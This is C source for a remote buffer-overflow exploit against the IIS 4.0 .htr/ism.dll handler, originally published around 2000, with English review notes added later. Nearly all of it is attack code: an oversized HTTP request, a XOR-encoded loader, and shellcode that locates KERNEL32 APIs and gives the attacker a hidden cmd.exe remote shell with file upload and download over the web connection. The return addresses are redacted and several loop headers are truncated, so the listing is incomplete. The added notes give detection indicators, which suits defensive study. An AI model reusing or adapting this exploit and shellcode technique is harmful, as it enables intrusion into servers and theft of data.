
windows下强大功能的溢出程序源代码

/*----------------------------------------------------------*/
/*   IIS4.0的.htr映射ism.dll溢出攻击程序                    */
/*   编写:yuange(yuange@nsfocus.com)                       */
/*   本程序实现所有语言版本WINDOWS下的溢出攻击。            */
/*   SHELLCODE代码实现绑定cmd.exe功能,实现上传、           */
/*   下传文件的ftp功能,实现加密传输功能,不开              */
/*   端口、不开服务,可以绕过防火墙等。独创的实             */
/*   现源代码编写shellcode的办法,可以方便编写、            */
/*   修改、调试shellcode,使得编写强大功能的                */
/*   shellcode成为可能。也解决了溢出攻击的几个根            */
/*   本问题:1、溢出点确定;2、shellcode定位;              */
/*   3、jmp esp功能代码地址确定;4、WINDOWS的API            */
/*   调用地址版本相关问题。另一个版本实现了接管             */
/*   WWW功能,可以实现不修改WEB页面文件的情况下替           */
/*   换所有WEB页面。                                        */
/*   一般的溢出攻击程序也可以使用这个框架                   */
/*                                                          */
/*   程序在vc6.0下编译通过                                  */
/*----------------------------------------------------------*/

/*
iis4.0  overflow program ver 1.0
copy by yuange  2000.05.8
*/

#include
#include
#include
#include

/* Layout constants shared by the client (main) and the in-process payload. */
/* Note: the four #include lines above lost their header names when the page was rendered. */
#define  FNENDLONG   0x08   // number of NOP bytes compared when searching for a function's start/end marker
#define  NOPCODE     'B'    // 0x42 = INC EDX; used as the filler byte in place of a 0x90 NOP (presumably because it is printable)
#define  NOPLONG     0x50   // filler bytes between the return-address area and the loader stub
#define  BUFFSIZE    0x20000   // size of the request and receive buffers in main()
#define  PATHLONG    0x12
// Length of the physical path (c:\inetpub\wwwroot).
// The WWW service prepends the physical path when it handles "GET /" before passing the request
// on to ISM.DLL, so the overflow offset depends on that path; the author notes the length was
// obtained from the .IDC/.ida/.idq physical-path disclosure issues of the time.

#define  RETEIPADDRESS 0xxxxx-PATHLONG+4+4
#define  ADD1          0xxxx-0xxxxx-PATHLONG+4
#define  ADD2      0xxxxx-0xxxxx-PATHLONG+4
/* For certain reasons these values are not provided  2000.10.25 */
// (The "0xxxx" placeholders above are the author's redaction; this file does not compile as published.)

// Addresses of the two parameters that must be handled; see the notes on the faulty ISM.DLL
// code referred to below (those notes are not part of this copy).

#define  SHELLBUFFSIZE 0x800   // I/O buffer inside the payload; also the chunk size for file transfer
#define  SHELLFNNUMS   12      // presumably the bound of the API-resolution loop in shellcodefn(), whose header is truncated in this listing
#define  DATAXORCODE   0xAA    // XOR key applied to every payload byte in transit; undone by the loader stub
#define  LOCKBIGNUM    19999999   // modulus of the session XOR keystream generator
#define  LOCKBIGNUM2   13579139   // seed of the session XOR keystream generator
#define  WEBPORT       80         // default target port

void     shellcodefnlock();                   // loader stub (machine code copied out of this executable)
void     shellcodefn(char *ecb);              // payload (machine code copied out of this executable)
void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);   // patch MSVC _chkesp calls out of a copied function
void     iisput(int fd,char *str);            // console command: upload a local file over the session
void     iisget(int fd,char *str);            // console command: download a remote file over the session
int      newrecv(int fd,char *buff,int size,int flag);   // recv() plus XOR decoding once enabled
int      newsend(int fd,char *buff,int size,int flag);   // XOR encoding (in place) plus send()

int      xordatabegin;               // set to 1 once the peer has sent "XORDATA"; enables decoding in newrecv()
int      lockintvar1,lockintvar2;    // keystream state for receive (1) and send (2), seeded with LOCKBIGNUM2%LOCKBIGNUM
char     lockcharvar;                // current keystream byte
// Note: the keystream is x = (x*0x100) % LOCKBIGNUM from a fixed seed, so it is identical for every
// session and derivable from these constants alone — this is obfuscation, not encryption, and
// captured traffic can be decoded for analysis.

/*
 * Client side of the tool. Builds one oversized HTTP GET for "default.htr", fills the
 * request path with NOPCODE bytes, copies the machine code of shellcodefnlock() (the
 * loader) and shellcodefn() (the payload) out of this very executable into the request,
 * sends it, and then acts as a console that relays stdin to the socket and socket data to
 * stderr, using the XOR stream in newsend()/newrecv() once the peer has replied "XORDATA".
 * The console words "iisput"/"iisget" are handled locally by iisput()/iisget().
 *
 * argv: [1] server (host, IP, or a URL prefix — a leading "scheme://" is stripped),
 *       [2] offset added to RETEIPADDRESS, [3] web port (default WEBPORT),
 *       [4] replacement for the GET prefix, [6] the word "debug" for a local self-test.
 * Returns 0; fatal setup errors exit(1) after a gets() pause.
 *
 * Review notes:
 *  - Several for(...) headers in this listing were truncated when the page was rendered
 *    (everything from the "<" up to the loop body is missing); they are left exactly as
 *    found, and the file does not compile in this state.
 *  - Every console read uses gets(), which has no length bound (removed in C11).
 *  - The "encryption" is a XOR stream started from two fixed constants
 *    (LOCKBIGNUM2 % LOCKBIGNUM), so recorded traffic is decodable by anyone who knows
 *    the constants — relevant for incident response.
 *  - Detection: by default the request is a GET for default.htr whose path is a very long
 *    run of 'B' (0x42) bytes followed by ".HTR HTTP/1.1"; the "XORDATA" reply from the
 *    server is a second indicator.
 */
int main(int argc, char **argv)
{
char *server;
// API names (NUL-separated) that the payload resolves on the target, followed by the
// command line, the "exit" line, the "XORDATA" banner and an end marker ("strend").
// Appended to the payload bytes in the request; the order must match shellcodefn().
char *str="LoadLibraryA""\x0""CreatePipe""\x0"
"CreateProcessA""\x0""CloseHandle""\x0"
"PeekNamedPipe""\x0"
"ReadFile""\x0""WriteFile""\x0"
"CreateFileA""\x0"
"GetFileSize""\x0"
"GetLastError""\x0"
"Sleep""\x0"
"cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
"XORDATA""\x0"
"strend";
char buff1[]="GET /""\xff""default.htr/";   // request prefix (argv[4] replaces it)
char buff2[]=".HTR HTTP/1.1 \nHOST:";        // request suffix; the server name follows
char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";   // NOP run marking function boundaries (FNENDLONG bytes are compared)
char SRLF[]="\x0d\x0a\x00\x00";               // CRLF appended to each console line

// Return-address candidates. The byte values were redacted by the author ("\xxx"),
// so these literals do not compile as published.
char eipexcept1[] ="\xxx\xxx\xxx\xxx";
// char eipexcept[] ="\xxx\xxx\xxx\xxx";
// ret
char  eipexcept[]="\xxx\xxx\xxx\xxx";
char  eipwinnt[] ="\xxx\xxx\xxx\xxx";
char  eipwinnt2[]="\xxx\xxx\xxx\xxx";
char  reteax[]   ="\xxx\xxx\xxx\xxx";

/* For certain reasons these values are not provided  2000.10.25 */

char  eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64";   // four NOPs followed by a 3-byte jump instruction

char    buff[BUFFSIZE];          // outgoing request, later the console line buffer
char    recvbuff[BUFFSIZE];      // console input (server name) and first server reply
char    shellcodebuff[0x1000];   // payload bytes before transit encoding
struct  sockaddr_in s_in2,s_in3;
struct  hostent *he;
char    *shellcodefnadd,*chkespadd;
unsigned  int sendpacketlong;

int       i,j,k;
unsigned  char temp;
int       fd;
u_short   port,port1,shellcodeport;
SOCKET    d_ip;                  // holds an IPv4 address, not a socket (type misuse; both are 32-bit on 32-bit Windows)
WSADATA   wsaData;
int       offset=0;
int       OVERADD=RETEIPADDRESS; // position of the overwritten return address inside buff
int       result;

fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 .");
fprintf(stderr,"\n copy by yuange(yuange@nsfocus.com) 2000.6.2.");
fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net/ .");
fprintf(stderr,"\n welcome to http://www.nsfocus.com/ .");
fprintf(stderr,"\n usage: %s [offset] [webport] \n", argv[0]);

// Interactive mode when no server was given: read server and offset from stdin.
if(argc <2){
fprintf(stderr,"\n please enter the web server:");
gets(recvbuff);   // unbounded read
for(i=0;i        if(recvbuff[i]!=' ') break;
}

server=recvbuff;
if(i

fprintf(stderr,"\n please enter the offset(0-3):");
gets(buff);
for(i=0;i     if(buff[i]!=' ') break;
}
offset=atoi(buff+i);
}

result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(1);
}

if(argc>2){
offset=atoi(argv[2]);
}
OVERADD+=offset;   // the offset shifts every address computed from RETEIPADDRESS below

/*
if(offset<0||offset>3){
fprintf(stderr,"\n offset error !offset  0 - 3 .");
gets(buff);
exit(1);
}

*/
// (The range check on offset above is disabled; any atoi() result is accepted.)

if(argc <2){
//     WSACleanup( );
//       exit(1);
}
else  server = argv[1];

// Normalise the server argument: skip leading spaces, drop a "scheme://" prefix, and
// cut the string at the first path separator.
for(i=0;i    if(server[i]!=' ')
break;
}
if(i

for(i=0;i+3     if(server[i]==':'){
if(server[i+1]=='\\'||server[i+1]=='/'){
if(server[i+2]=='\\'||server[i+2]=='/'){
server+=i;
server+=3;
break;
}
}
}
}
// strlen() is re-evaluated every iteration, so the loop ends right after the first cut.
for(i=1;i<=strlen(server);++i){
if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
}

// Resolve the host: dotted quad first, DNS otherwise. -1 is INADDR_NONE.
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he)
{
WSACleanup( );
printf("\n Can't get the ip of %s !\n",server);
gets(buff);
exit(1);
}
else    memcpy(&d_ip, he->h_addr, 4);
}

if(argc>3) port=atoi(argv[3]);
else   port=WEBPORT;
if(port==0) port=WEBPORT;

fd = socket(AF_INET, SOCK_STREAM,0);
i=8000;
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));   // 8 s receive timeout; result unchecked

s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));

if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0)  {
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n  connect err.");
gets(buff);
exit(1);
}

// Resolve the address of the MSVC debug-runtime stack check _chkesp, following the
// incremental-link JMP thunk (opcode 0xE9 + rel32) if the symbol points at one.
// cleanchkesp() needs it to recognise the calls the compiler inserted into shellcodefn().
_asm{
mov ESI,ESP
cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
++chkespadd;
i=*(int*)chkespadd;
chkespadd+=i;
chkespadd+=4;
}

// Locate shellcodefnlock()'s body the same way and find its leading NOP marker.
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}

for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
// Fill the request with NOPCODE, put the GET prefix in front, and copy 0x80 bytes of the
// loader stub (starting 4 bytes into its NOP marker) behind the return-address area.
memset(buff,NOPCODE,BUFFSIZE);
if(argc>4){
memcpy(buff,argv[4],strlen(argv[4]));
}
else  memcpy(buff,buff1,strlen(buff1));

memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);

// Extract shellcodefn() up to its trailing NOP marker, patch out the _chkesp calls, and
// append the API-name table up to (not including) "strend".
shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}

for(k=0;k<=0x1000;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}

memcpy(shellcodebuff,shellcodefnadd,k);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
for(i=0;i<0x400;++i){
if(memcmp(str+i,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,i);

sendpacketlong=k+i;
// Find the end of the loader stub already in buff; the encoded payload goes right after it.
for(k=0;k<=0x200;++k){
if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
}

// Transit encoding: every byte is XORed with DATAXORCODE; a result that would break the
// request (<=0x10, space, '.', '/', '\\', '0', '?', '%') is escaped as '0' followed by
// the value plus 0x40. The loader stub in shellcodefnlock() reverses exactly this.
for(i=0;i    temp=shellcodebuff[i];
temp^=DATAXORCODE;
if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='\\'||temp=='0'||temp=='?'||temp=='%'){
buff[OVERADD+NOPLONG+k]='0';
++k;
temp+=0x40;
}
buff[OVERADD+NOPLONG+k]=temp;
++k;
}

//  memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);
//  k+=sendpacketlong;

// Write the (redacted) return-address candidates at the offsets derived from ADD1, ADD2
// and OVERADD; i ends at 0x30 and indexes the trailing entries below.
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+ADD1+offset+i,eipexcept,4);
memcpy(buff+ADD2+offset+i,eipexcept,4);
}

for(i=-0x30;i<0x30;i+=4){
memcpy(buff+OVERADD+i,eipexcept,4);
}
memcpy(buff+OVERADD+i,eipwinnt2,4);
memcpy(buff+OVERADD+i+4,reteax,4);
memcpy(buff+OVERADD+i+8,eipwinnt,4);
memcpy(buff+OVERADD+i+0x0c,eipwinnt,4);
memcpy(buff+OVERADD+i+0x10,eipjmpshell,7);

// fprintf(stderr,"\n send:\n %s",buff);
fprintf(stderr,"\n offset:%d",offset);
/*

if(argc>2){
server=argv[2];
if(strcmp(server,"win9x")==0){
memcpy(buff+OVERADD,eipwin9x,4);
fprintf(stderr,"\n nuke win9x.");
}
if(strcmp(server,"winnt")==0){
memcpy(buff+OVERADD,eipwinnt,4);
fprintf(stderr,"\n nuke winnt.");
}

}

*/

// Terminate the request: ".HTR HTTP/1.1 \nHOST:" + server + blank line. buff is
// NOPCODE-filled up to here, so strlen() below measures the whole request.
sendpacketlong=k+OVERADD+NOPLONG;
strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);
strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n");
// printf("\n send buff:\n%s",buff);
//  strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);

/*
#ifdef DEBUG
_asm{
lea esp,buff
add esp,OVERADD
ret

}
#endif

*/
// Local self-test: with argv[6]=="debug", transfer control into buff the way the
// overflowed target would, running the payload on this machine.
if(argc>6){
if(strcmp(argv[6],"debug")==0){
_asm{
lea esp,buff
add esp,OVERADD
ret
}
}
}

// Send the request once. A reply starting with "XORDATA" means the payload is running;
// from then on all traffic is XOR-obfuscated.
xordatabegin=0;
for(i=0;i<1;++i){
j=sendpacketlong;
fprintf(stderr,"\n send  packet %d bytes.",j);
send(fd,buff,j,0);
k=newrecv(fd,recvbuff,0x1000,0);
if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
xordatabegin=1;
k=-1;
fprintf(stderr,"\n ok!\n");
}
if(k>0){
recvbuff[k]=0;
fprintf(stderr,"\n  recv:\n %s",recvbuff);
}

}

k=1;
ioctlsocket(fd, FIONBIO, &k);   // non-blocking for the console loop (FIONBIO expects a u_long)

// fprintf(stderr,"\n now begin: \n");

// Seed both keystream directions; the payload seeds identically on its side.
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;

// Console loop: when the socket has nothing (k<0), read a line from stdin; "iisput"/
// "iisget" are executed locally, anything else is sent with CRLF appended. Then print
// whatever the peer sent. The loop ends when recv() returns 0 (connection closed).
k=1;
while(k!=0){
if(k<0){
i=0;
while(i==0){
gets(buff);
if(memcmp(buff,"iisput",6)==0){
iisput(fd,buff+6);
}
else{
if(memcmp(buff,"iisget",6)==0){
iisget(fd,buff+6);
}
else i=1;
}
}
k=strlen(buff);
memcpy(buff+k,SRLF,3);
newsend(fd,buff,k+2,0);

}
k=newrecv(fd,buff,0x1000,0);
if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){
xordatabegin=1;
k=-1;
}

if(k>0){
buff[k]=0;
fprintf(stderr,"%s",buff);
}
//   if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n the server close connect.");
gets(buff);
return(0);
}

/*
 * Loader stub. Never called as a C function: main() copies its bytes (starting 4 bytes
 * into the leading NOP marker) into the request, right behind the return-address area,
 * and the encoded payload follows it. Do not restyle — the byte layout is what is sent.
 *
 * What the code does, as far as the listing shows:
 *  - the first part writes a zero byte through a pointer reached via esi (+0x474, or the
 *    dword behind it); what that terminates is not visible here (presumably part of the
 *    request on the target — unconfirmed);
 *  - getediadd/looplock decode the payload that follows in place: each byte is XORed
 *    with DATAXORCODE, and a '0' byte means "take the next byte minus 0x40" — the exact
 *    inverse of the encoding loop in main();
 *  - ebx is pushed twice, as shellcodefn's ecb argument and as a fake return address,
 *    and execution then falls through the NOPs into the decoded payload.
 * The runs of 8 NOPs at both ends are the markers main() searches for with fnendstr.
 */
void  shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop

_emit('?')                 // single byte 0x3F; its purpose is not evident from the listing

xor ecx,ecx
add si,474h                // only the low 16 bits of esi are adjusted
cmp dword ptr [esi],ecx
jnz getesi
add si,4
getesi:          mov esi,[esi]
add si,8
xor ecx,ecx
mov byte ptr [esi],cl      // write a terminating zero byte

jmp   next
getediadd:      pop   EDI          // edi = address right after "call getediadd": the encoded payload
push  EDI
pop   ESI                          // esi = edi: decode in place
push  ebx   //  ecb
push  ebx   //  call shellcodefn ret address
xor   ecx,ecx
looplock:         lodsb            // read next encoded byte
cmp  al,cl                         // a zero byte ends the payload
jz   shell
cmp  al,0x30                       // '0' escape: next byte is value+0x40
jz   clean0
sto:              xor  al,DATAXORCODE
stosb
jmp  looplock
clean0:           lodsb
sub al,0x40
jmp sto
next:             call  getediadd
shell:           NOP                // decoded payload starts right after these NOPs
NOP
NOP
NOP
NOP
NOP
NOP
NOP

}
}

/*
 * In-process payload. Compiled as an ordinary C function, then copied byte-for-byte by
 * main() up to the trailing NOP marker (with _chkesp calls patched out by cleanchkesp())
 * and followed in the request by the API-name string table `str`. Do not restyle: the
 * asm blocks depend on exact byte offsets (stradd-0x07, stradd-0x0e).
 *
 * On the target it:
 *  1. installs a temporary SEH frame (except[]) so that touching an unmapped page during
 *     the module scan resumes the loop instead of crashing the process;
 *  2. scans memory for a loaded module whose PE export directory is named KERNEL32 and
 *     reads GetProcAddress out of its export table;
 *  3. resolves the remaining APIs by name from the string table (the order there must
 *     match the FARPROC locals below — see the note at the resolving loop);
 *  4. starts cmd.exe with stdin/stdout/stderr redirected to two pipes, sends the
 *     "XORDATA" banner through the writeclient callback, and then relays pipe output to
 *     the client and client input to cmd.exe, XOR-obfuscated with the same stream as the
 *     client; "put "/"get " requests transfer files via CreateFileA/ReadFile/WriteFile.
 *
 * ecb: presumably the ISAPI extension control block handed over by the loader (the names
 *      and the offsets 8, 0x84, 0x88 read below suggest ConnID, WriteClient, ReadClient).
 *
 * Defender notes: no new port is opened — the shell rides the existing HTTP connection —
 * so the observable artifacts are the web server process spawning cmd.exe with inherited
 * pipe handles and file creation by that process tree. The XOR stream is derived from
 * fixed constants and gives no confidentiality.
 */
void shellcodefn(char *ecb)
{
char        Buff[SHELLBUFFSIZE+2];
int         *except[3];      // SEH record: [0]=next (-1 = end), [1]=handler, [2]=saved previous head

// Resolved API addresses. They are declared before apifnadd[] on purpose: the resolving
// loop below writes apifnadd[k] for k>=1 and relies on the compiler laying these locals
// out contiguously above it (VC6-specific and fragile).
FARPROC     Sleepadd;
FARPROC     GetLastErroradd;
FARPROC     GetFileSizeadd;
FARPROC     CreateFileAadd;
FARPROC     WriteFileadd;
FARPROC     ReadFileadd;
FARPROC     PeekNamedPipeadd;
FARPROC     CloseHandleadd;
FARPROC     CreateProcessadd;
FARPROC     CreatePipeadd;

FARPROC    procloadlib;
FARPROC     apifnadd[1];
FARPROC     procgetadd=0;                      // GetProcAddress, once found
FARPROC     writeclient= *(int *)(ecb+0x84);
FARPROC     readclient = *(int *)(ecb+0x88);
HCONN       ConnID     = *(int *)(ecb+8) ;
char        *stradd;                           // walks the string table appended after this code
int         imgbase,fnbase,i,k,l;
HANDLE      libhandle,fpt;   //libwsock32;
STARTUPINFO siinfo;

PROCESS_INformATION ProcessInformation;        // sic: probably PROCESS_INFORMATION, case damaged in rendering
HANDLE   hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
int         lBytesRead;
int  lockintvar1,lockintvar2;                  // local copies shadow the globals of the same name
char lockcharvar;
SECURITY_ATTRIBUTES sa;

// stradd = return address of the call in nextcall, which in the transmitted copy is where
// main() appended the string table. Then install except[] as the current SEH frame.
_asm {
jmp    nextcall
getstradd:   pop    stradd
lea    EDI,except
mov    eax,dword ptr FS:[0]
mov    dword ptr [edi+0x08],eax
mov    dword ptr FS:[0],EDI
}

except[0]=0xffffffff;
except[1]=stradd-0x07;            // handler = execptprogram (jmp errprogram), 7 bytes before stradd

// Record the resume address (the loop below) in the handler's immediate, see getexceptretadd.
imgbase=0x77e00000;
_asm{
call getexceptretadd
}
// NOTE: the comma operator makes only procgetadd==0 the loop condition; the bound
// imgbase<0xbffa0000 is evaluated and discarded, so an unsuccessful scan never stops.
for(;imgbase<0xbffa0000,procgetadd==0;){
imgbase+=0x10000;
if(imgbase==0x78000000) imgbase=0xbff00000;   // skip from the first address range to the second
// 'ZM' / 'EP' are MSVC multi-char constants compared against "MZ" / "PE\0\0" in memory.
if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;   // export directory
k=*(int *)(fnbase+0xc)+imgbase;                                 // export directory Name
if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){                  // "KERNEL32"
libhandle=imgbase;
k=imgbase+*(int *)(fnbase+0x20);                                // AddressOfNames
for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){                     // NumberOfNames
if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){   // "GetProcA..."
k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));                 // AddressOfNameOrdinals[l]
k+=*(int *)(fnbase+0x10)-1;                                     // adjust by export Base
k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));              // AddressOfFunctions[ordinal]
procgetadd=k+imgbase;
break;
}
}
}
}
}
// Search for the KERNEL32.DLL module base and the address of the GetProcAddress API.
// Note that this handles the case where a scanned page is not present (via the SEH frame).

// Uninstall the SEH frame: restore the saved previous head.
_asm{
lea edi,except
mov eax,dword ptr [edi+0x08]
mov dword ptr fs:[0],eax
}

if(procgetadd==0) goto  die ;

// Resolve the APIs named in the string table in order; after each name, advance stradd
// past its NUL. (Loop header truncated in this listing; presumably bounded by SHELLFNNUMS.)
for(k=1;k        apifnadd[k]=procgetadd(libhandle,stradd);
for(;;++stradd){
if(*(stradd)==0&&*(stradd+1)!=0) break;
}
++stradd;
}

sa.nLength=12;                   // sizeof(SECURITY_ATTRIBUTES) on 32-bit
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;          // pipe handles must be inheritable by the child

CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);   // child stdout/stderr -> hReadPipe1
CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);   // hWritePipe2 -> child stdin

// ZeroMemory(&siinfo,sizeof(siinfo));
// Zero 0x11 dwords (68 bytes, sizeof STARTUPINFO on 32-bit); the NZ of repnz is ignored by stosd.
_asm{
lea EDI,siinfo
xor eax,eax
mov ecx,0x11
repnz stosd
}
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;
// k=0;
// while(k==0){
// stradd now points at "cmd.exe" (table order); afterwards +8 skips it to "\r\nexit\r\n".
k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
stradd+=8;
// }
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);

// Banner: stradd+9 is "XORDATA\0" (9 bytes past "\r\nexit\r\n\0"); the client switches
// on its XOR decoding when it sees it.
k=8;
writeclient(ConnID,stradd+9,&k,0);

// Same seed as the client (main); var1 decodes client input, var2 encodes output.
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;

while(1){
// Anything cmd.exe wrote goes to the client, XOR-encoded.
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
if(lBytesRead>0){
ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(lBytesRead>0){
for(k=0;k                    lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[k]^=lockcharvar;
}
writeclient(ConnID,Buff,&lBytesRead,0);
}
}
else{
// Otherwise read from the client and decode.
lBytesRead=SHELLBUFFSIZE;
l=0;
while(l==0){
k=readclient(ConnID,Buff,&lBytesRead);
for(l=0;l                        lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[l]^=lockcharvar;
}
// "put ": Buff[4..7] = file length, Buff[8..] = file name; the data follows in later reads.
if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]==' '){
l=*(int *)(Buff+4);
//                 WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);

fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0)

;
k=GetLastErroradd();     // result unused
i=0;
while(l>0){
k=readclient(ConnID,Buff,&lBytesRead);
if(k==1){
if(lBytesRead>0){
for(k=0;k                                         lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[k]^=lockcharvar;
}
l-=lBytesRead;
WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
}
}
else{
Sleepadd(0100);          // octal literal: 64 ms (probably meant 100)
++i;
}
if(i>10000) l=0;             // give up after 10000 failed reads
}
CloseHandleadd(fpt);
l=0;
}
else{
// "get ": Buff[4..] = file name. Reply "size" + 4-byte length, then the content in chunks.
if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]==' '){

fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
Sleepadd(100);
l=GetFileSizeadd(fpt,&k);
*(int *)Buff='ezis';        //size
*(int *)(Buff+4)=l;
lBytesRead=8;
for(i=0;i                               lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar;
}
writeclient(ConnID,Buff,&lBytesRead,0);
//    Sleepadd(100);
i=0;
while(l>0){
k=SHELLBUFFSIZE;
ReadFileadd(fpt,Buff,k,&k,0);
if(k>0){
for(i=0;i                                       lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar;
}
i=0;
l-=k;
writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC);
//                                    Sleepadd(100);
}
else ++i;
if(i>100) l=0;               // give up after 100 empty reads
}
CloseHandleadd(fpt);
l=0;
}
else l=1;                    // plain command line: leave the read loop and forward it
}
}

// readclient failed: ask cmd.exe to exit (three times) and then sleep forever.
if(k!=1){
k=8;
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
while(1){
Sleepadd(0x7fffffff);                  // hang forever
}

}
else{
WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);   // forward the line to cmd.exe stdin
//             Sleepadd(1000);
}
}
}

die: goto die  ;                   // GetProcAddress not found: spin forever rather than crash

// Helper routines; the byte counts in the comments are what the stradd-0x07 / stradd-0x0e
// offsets above depend on.
_asm{

getexceptretadd:   pop  eax        // eax = resume address (the scan loop)
push eax
mov  edi,dword ptr [stradd]
mov dword ptr [edi-0x0e],eax      // store it into the 0x11223344 immediate below
ret
errprogram:       mov eax,dword ptr [esp+0x0c]   // exception handler: [esp+0x0c] appears to be the CONTEXT pointer
add eax,0xb8                                    // offset of Eip in a 32-bit CONTEXT
mov dword ptr [eax],0x11223344  //stradd-0xe   // patched resume address
xor eax,eax        //2                          // return 0 = continue execution
ret            //1
execptprogram:     jmp errprogram    //2 bytes stradd-7
nextcall:          call getstradd    //5 bytes
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}

}

/*
 * Patch the MSVC debug-build stack checks out of a copied function. Scans shellbuff for
 * 0xE8 (CALL rel32) whose target, computed relative to the original location fnadd, is
 * chkesp, and replaces the 5-byte call with NOP, INC EBX, DEC EBX, INC EBX, DEC EBX —
 * five bytes with no net effect. Needed because the copy runs at a different address,
 * where the original rel32 would point nowhere.
 *
 * fnadd:     address the bytes were copied from (used only to compute call targets)
 * shellbuff: the copy, modified in place
 * chkesp:    resolved address of _chkesp (see main())
 * len:       number of bytes in shellbuff; the loop header is truncated in this listing
 *
